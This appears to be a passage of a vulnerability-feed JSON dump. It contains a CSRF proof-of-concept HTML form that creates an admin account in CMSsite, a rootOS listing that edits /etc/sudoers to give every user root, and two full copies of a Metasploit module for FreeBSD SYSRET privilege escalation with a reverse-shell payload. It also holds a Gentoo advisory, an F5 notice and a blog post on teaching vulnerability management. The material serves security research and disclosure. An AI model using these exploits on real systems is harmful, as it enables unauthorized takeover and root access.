manamtabeshekan[@]gmail[.]com\r\n# Discovery Date: March 1, 2019\r\n# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite\r\n# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip\r\n# Tested Version: 1.0\r\n# Tested on: Kali linux, Windows 8.1 \r\n\r\n# PoC:\r\n\r\n<html>\r\n<head>\r\n <title>Add Admin</title>\r\n</head>\r\n<body>\r\n<form role=\"form\" action=\"http://localhost/[PATH]/admin/users.php?source=add_user\" method=\"POST\" enctype=\"multipart/form-data\">\r\n\r\n <div class=\"form-group\">\r\n <label for=\"user_title\">User Name</label>\r\n <input type=\"text\" name=\"user_name\" required><br><br>\r\n </div>\r\n\r\n <div class=\"form-group\">\r\n <label for=\"user_author\">FirstName</label>\r\n <input type=\"text\" name=\"user_firstname\" required><br><br>\r\n </div>\r\n\r\n <div class=\"form-group\">\r\n <label for=\"user_status\">LastName</label>\r\n <input type=\"text\" name=\"user_lastname\" required><br><br>\r\n </div>\r\n\r\n <div class=\"form-group\">\r\n <label for=\"user_image\">Image</label>\r\n <input type=\"file\" name=\"user_image\" required><br><br>\r\n </div>\r\n <div class=\"input-group\">\r\n <select name=\"user_role\" id=\"\">\r\n <label for=\"user_role\">Role</label>\r\n <option value='Admin'>Admin</option><option value='User'>User</option>\r\n </select><br><br>\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"user_tag\">Email</label>\r\n <input type=\"email\" name=\"user_email\" required><br><br>\r\n\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"user_tag\">Password</label>\r\n <input type=\"password\" name=\"user_password\" required><br><br>\r\n </div>\r\n\r\n <button type=\"submit\" name=\"create_user\" value=\"Add User\">Add User</button>\r\n\r\n</form>\r\n</body>\r\n</html>\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32295"}], "gentoo": [{"lastseen": "2019-03-11T01:51:29", "bulletinFamily": "unix", "description": "### Background\n\nrdesktop is a Remote Desktop Protocol (RDP) Client.\n\n### Description\n\nMultiple vulnerabilities have been discovered in rdesktop. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could cause a Denial of Service condition, obtain sensitive information, or execute arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll rdesktop users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/rdesktop-1.8.4\"", "modified": "2019-03-10T00:00:00", "published": "2019-03-10T00:00:00", "id": "GLSA-201903-06", "href": "https://security.gentoo.org/glsa/201903-06", "title": "rdesktop: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kitploit": [{"lastseen": "2019-03-09T23:44:18", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-k0IrLvY7RBI/XH1DwUAawmI/AAAAAAAAOPM/KibOZi-Qod0jZledYHdFaomLrSifHgHfwCLcBGAs/s1600/rootOS_1_screenshot.png>)\n\n \nTries to use various CVEs to gain sudo or root access. All [ exploits ](<https://www.kitploit.com/search/label/Exploits>) have an end goal of adding ` ALL ALL=(ALL) NOPASSWD: ALL ` to ` /etc/sudoers ` allowing any user to run ` sudo ` commands. \n \n** Exploits ** \n\n\n * CVE-2008-2830 \n * CVE-2015-3760 \n * CVE-2015-5889 \n * CVE-2017-13872 \n * AppleScript Dynamic Phishing \n * Sudo Piggyback [ Link ](<https://www.n00py.io/2016/10/privilege-escalation-on-os-x-without-exploits/>)\n \n** Run ** \n\n \n \n python root.py\n\n \n \n\n\n** [ Download rootOS ](<https://github.com/thehappydinoa/rootOS>) **\n", "modified": "2019-03-09T20:25:09", "published": "2019-03-09T20:25:09", "id": "KITPLOIT:4066304721921583015", "href": "http://www.kitploit.com/2019/03/rootos-macos-root-helper.html", "title": "rootOS - macOS Root Helper", "type": "kitploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2019-03-24T02:37:18", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-03-07T23:18:00", "published": "2019-03-07T23:18:00", "id": "F5:K64765350", "href": "https://support.f5.com/csp/article/K64765350", "title": "QEMU vulnerability CVE-2015-4037", "type": "f5", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2019-03-07T15:18:36", "bulletinFamily": "exploit", "description": "", "modified": "2019-03-07T00:00:00", "published": "2019-03-07T00:00:00", "id": "EDB-ID:46508", "href": "https://www.exploit-db.com/exploits/46508", "type": "exploitdb", "title": "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD kernel,\r\n when running on 64-bit Intel processors.\r\n\r\n By design, 64-bit processors following the X86-64 specification will\r\n trigger a general protection fault (GPF) when executing a SYSRET\r\n instruction with a non-canonical address in the RCX register.\r\n\r\n However, Intel processors check for a non-canonical address prior to\r\n dropping privileges, causing a GPF in privileged mode. As a result,\r\n the current userland RSP stack pointer is restored and executed,\r\n resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 8.3-RELEASE (amd64); and\r\n FreeBSD 9.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Rafal Wojtczuk', # Discovery\r\n 'John Baldwin', # Discovery\r\n 'iZsh', # Exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => '2012-06-12',\r\n 'Platform' => ['bsd'],\r\n 'Arch' => [ARCH_X64],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '53856'],\r\n ['CVE', '2012-0217'],\r\n ['EDB', '28718'],\r\n ['PACKETSTORM', '113584'],\r\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\r\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\r\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\r\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\r\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\r\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\r\n ],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\r\n 'DefaultTarget' => 0))\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data, gcc_args='')\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def strip_comments(c_code)\r\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n arch = cmd_exec('uname -m').to_s\r\n unless arch.include? '64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\r\n unless hw_model.downcase.include? 'intel'\r\n vprint_error \"#{hw_model} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{hw_model} is vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload and compile exploit executable\r\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n unless is_root?\r\n fail_with Failure::Unknown, 'Exploitation failed'\r\n end\r\n print_good \"Success! Executing payload...\"\r\n\r\n cmd_exec payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46508"}], "packetstorm": [{"lastseen": "2019-03-07T11:22:21", "bulletinFamily": "exploit", "description": "", "modified": "2019-03-07T00:00:00", "published": "2019-03-07T00:00:00", "id": "PACKETSTORM:152001", "href": "https://packetstormsecurity.com/files/152001/FreeBSD-Intel-SYSRET-Privilege-Escalation.html", "title": "FreeBSD Intel SYSRET Privilege Escalation", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD Intel SYSRET Privilege Escalation', \n'Description' => %q{ \nThis module exploits a vulnerability in the FreeBSD kernel, \nwhen running on 64-bit Intel processors. \n \nBy design, 64-bit processors following the X86-64 specification will \ntrigger a general protection fault (GPF) when executing a SYSRET \ninstruction with a non-canonical address in the RCX register. \n \nHowever, Intel processors check for a non-canonical address prior to \ndropping privileges, causing a GPF in privileged mode. As a result, \nthe current userland RSP stack pointer is restored and executed, \nresulting in privileged code execution. \n \nThis module has been tested successfully on: \n \nFreeBSD 8.3-RELEASE (amd64); and \nFreeBSD 9.0-RELEASE (amd64). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Rafal Wojtczuk', # Discovery \n'John Baldwin', # Discovery \n'iZsh', # Exploit \n'bcoles' # Metasploit \n], \n'DisclosureDate' => '2012-06-12', \n'Platform' => ['bsd'], \n'Arch' => [ARCH_X64], \n'SessionTypes' => ['shell'], \n'References' => \n[ \n['BID', '53856'], \n['CVE', '2012-0217'], \n['EDB', '28718'], \n['PACKETSTORM', '113584'], \n['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'], \n['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'], \n['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'], \n['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'], \n['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'], \n['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation'] \n], \n'Targets' => \n[ \n['Automatic', {}] \n], \n'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' }, \n'DefaultTarget' => 0)) \nregister_advanced_options [ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data, gcc_args='') \nupload \"#{path}.c\", data \n \ngcc_cmd = \"gcc -o #{path} #{path}.c\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \nregister_file_for_cleanup path \nchmod path \nend \n \ndef exploit_data(file) \n::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file) \nend \n \ndef is_root? \n(cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0') \nend \n \ndef strip_comments(c_code) \nc_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '') \nend \n \ndef check \nkernel_release = cmd_exec('uname -r').to_s \nunless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/ \nvprint_error \"FreeBSD version #{kernel_release} is not vulnerable\" \nreturn Exploit::CheckCode::Safe \nend \nvprint_good \"FreeBSD version #{kernel_release} appears vulnerable\" \n \narch = cmd_exec('uname -m').to_s \nunless arch.include? '64' \nvprint_error \"System architecture #{arch} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"System architecture #{arch} is supported\" \n \nhw_model = cmd_exec('/sbin/sysctl hw.model').to_s \nunless hw_model.downcase.include? 'intel' \nvprint_error \"#{hw_model} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"#{hw_model} is vulnerable\" \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nif is_root? \nunless datastore['ForceExploit'] \nfail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' \nend \nend \n \nunless writable? base_dir \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload and compile exploit executable \nexecutable_name = \".#{rand_text_alphanumeric 5..10}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nupload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall' \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status 'Launching exploit...' \noutput = cmd_exec executable_path \noutput.each_line { |line| vprint_status line.chomp } \n \nunless is_root? \nfail_with Failure::Unknown, 'Exploitation failed' \nend \nprint_good \"Success! Executing payload...\" \n \ncmd_exec payload_path \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152001/intel_sysret_priv_esc.rb.txt"}], "avleonov": [{"lastseen": "2019-03-04T12:25:35", "bulletinFamily": "blog", "description": "In the last three weeks, I participated in [Tinkoff Fintech School](<https://fintech.tinkoff.ru/tfschool/about>) - educational program for university students. Together with my colleagues, we prepared a three-month [practical Information Security course](<https://fintech.tinkoff.ru/tfschool/infsec>): 1 lecture per week with tests and home tasks. \n\nEach lecture is given by a member of our security team, specialized in one of the following modules: **Vulnerability Management**, Application Security, Infrastructure Security, Network Security, Virtualization Security, Banking Systems Security, Blue & Red-teaming, etc.\n\n[](<https://avleonov.com/wp-content/uploads/2019/03/vm_fintech.png>)\n\nThe course is still ongoing, but my Vulnerability Management module is over. Therefore, I want to share my impressions and some statistics.\n\n### Lecture\n\nThe content was pretty much the same as for [my lecture at MIPT ](<https://avleonov.com/2018/12/29/mipt-phystech-guest-lecture-vulnerabilities-money-and-people/>)in December last year. I removed some boring slides about Vulnerability Databases, added some [more critics of Vulnerability Management products](<https://avleonov.com/2018/12/21/guinea-pig-and-vulnerability-management-products/>), their [reports](<https://avleonov.com/2019/01/12/whats-wrong-with-patch-based-vulnerability-management-checks/>) and [detection methods](<https://avleonov.com/2019/02/11/no-left-boundary-for-vulnerability-detection/>). And I also updated information about [open vacancies](<https://avleonov.com/2019/02/04/open-positioner-my-new-project-for-tracking-it-and-security-jobs/>) related to Vulnerability Management.\n\n### Testing\n\nIn the beginning of each lecture, students should solve some tests based on the materials of the previous lecture. Basically it is for motivating them to visit lectures. \n\nI always wondered why Information Security tests are always so weird. They either check the knowledge of some terms or definitions invented by some nonames or the knowledge of reference data, the markings of fire extinguishers in the CISSP exam, for example. Or it is a fascinating game: guess the logic of the individual, who made this question. Anyway, it's far from the real life and the real practice. \n\nWell, I thought so until I had to make my own questions.  It turned out that it's pretty hard to make them unambiguous, reasonable and not based on the subjective experience. As a result, the questions were about Vulnerability Management process, [Vulnerability life cycle](<https://avleonov.com/2019/01/30/vulnerability-life-cycle-and-vulnerability-disclosures/>), [basic vulnerability types](<https://avleonov.com/2018/11/29/making-vulnerable-web-applications-xxs-rce-sql-injection-and-stored-xss-buffer-overflow/>), and Vulnerability Detection issues. All this were in the lecture. Many students answered all the questions correctly, so it seems to me that the test wasn't bad.\n\n### Homework\n\nAnd the most interesting and intriguing part was the homework. There were 2 tasks and the deadline was two weeks. \n\n#### Task 1. Vulnerability Detection and Exploitation\n\n_Deploy virtual machines in your home environment:_\n\n 1. _Vulnerable Target host (for example, Metasploitable or an old version of Windows/Linux)_\n 2. _Vulnerability Scanner (for example, Nessus Home, OpenVAS, Nexpose Community)_\n 3. _Exploitation Tool (for example, Metasploit or some separate exploits)_\n\n_Run vulnerable service on a Vulnerable Target host (for example, SSH), detect vulnerability with Vulnerability Scanner, exploit a vulnerability and get remote access to the host. Make a report how you did it step by step and describe each of your choices. _\n\n_Bonus: write your own detection script for the exploited vulnerability._\n\nIn this task I wanted the students to see \n\n * how the vulnerability could be detected and exploited;\n * that the Vulnerability Scanner is not some magical tool and they can make a small scanner on their own.\n\nThe task was intentionally formulated in a very wide way, without mentioning actual tools and vulnerabilities, because I was curious what exactly would they choose. So, those who are not really interested in the topic could choose something easy, and those who like this stuff could use this task to make an interesting research. \n\nMost of the students chose Metasploitable as a vulnerable target host. Actually, this is the easiest way. But, as you can see, some students chose the usual operating systems: Windows, Ubuntu Linux and docker containers.\n\n\n\nThe same number of students used [Nessus Home](<https://avleonov.com/2016/05/16/tenable-nessus-registration-installation-scanning-reporting/>) and OpenVAS for vulnerability detection. They registered Nessus Home on their own and used it at home environment, so the license agreement was not violated.\n\n\n\nIn most cases students used Metasploit for exploitation. But sometimes it were some custom python scripts or just a curl.\n\n\n\nThey exploited very different vulnerabilities: \n\n\n\n 1. BID:48539 - vsftpd Compromised Source Packages Backdoor Vulnerability \n\n 2. CVE-2004-2687 - DistCC Daemon Command Execution \n 3. CVE-2007-2447 - Samba \"username map script\" Command Execution\n 4. CVE-2008-0166 - Predictable PRNG Brute Force SSH\n 5. CVE-2010-2075 - UnrealIRCD 3.2.8.1 Backdoor Command Execution\n 6. CVE-2015-1427 - Elasticsearch Search Groovy Sandbox Bypass\n 7. **CVE-2017-12617 - Apache Tomcat JSP Upload Bypass / Remote Code Execution**\n 8. CVE-2017-9462 - Mercurial Custom hg-ssh Wrapper Remote Code Exec\n 9. **CVE-2019-0724 - Microsoft Exchange Server Remote Privilege Escalation Vulnerability**\n 10. Distributed Ruby - Distributed Ruby Remote Code Execution\n 11. MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution\n 12. **MS17-010 - Remote code execution in Microsoft Server Message Block 1.0 (SMBv1) server (EternalBlue)**\n 13. ssh bruteforce - brute-force guess SSH login credentials\n\nI liked the most exploitation of Apache Tomcat RCE (in a docker image), [classical MS17-010](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>) and new [Microsoft Exchange Server issue](<https://www.tenable.com/blog/proof-of-concept-code-gives-standard-microsoft-exchange-users-domain-administrator-privileges>), because these are the most practical cases. The bruteforce of SSH logins and passwords was not the exploitation that was expected in this task, but why not, this also often happens. \n\nAnd finally the detection scripts. Most of them were unauthenticated and version-based, written in python or bash.\n\n\n\n#### Task 2. Vulnerability Scoring\n\n_Find a new CVE vulnerability without a CVSS vector on _[_nvd.nist.gov_](<https://nvd.nist.gov/>)_ (\"UNDERGOING ANALYSIS\" state) and make CVSS v.3 Base and Temporal Vector for it. Justify your choice. It is advisable to pass the task before the vector will be published on the NVD website._\n\nIn this task I wanted students to see how the criticality of a vulnerability (that Vulnerability Scanner shows) is actually being produced. The vector was not really matter. In fact, it was possible to get Base Vector from the original vulnerability research.  The important part was the justification like \"I chose Attack Vector (AV): Network because\u2026\" just to be seen that this is not a random choice. \n\nAs you can see, very few people take the same vulnerabilities, that is definitely a good sign:\n\n\n\nIt also might be interesting to compare the vector that they've got as a result of this task with the vector from the NVD. Most likely there will the differences because CVSS is pretty subjective. \n\n### In conclusion\n\nThis was my second time when I gave a lecture and the first time I made additional educational content: tests and homework. It was very cool and exciting. I hope the students have their fun too. \n\nThis was only the first module, there is still a lot of content and interesting practical tasks from my colleagues. I hope that all the students will successfully go through all the stages and with some of them we will meet at work or on internship.\n\n", "modified": "2019-03-04T10:38:31", "published": "2019-03-04T10:38:31", "id": "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F", "href": "http://feedproxy.google.com/~r/avleonov/~3/VfGsxXaJTBs/", "type": "avleonov", "title": "Vulnerability Management at Tinkoff Fintech School", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
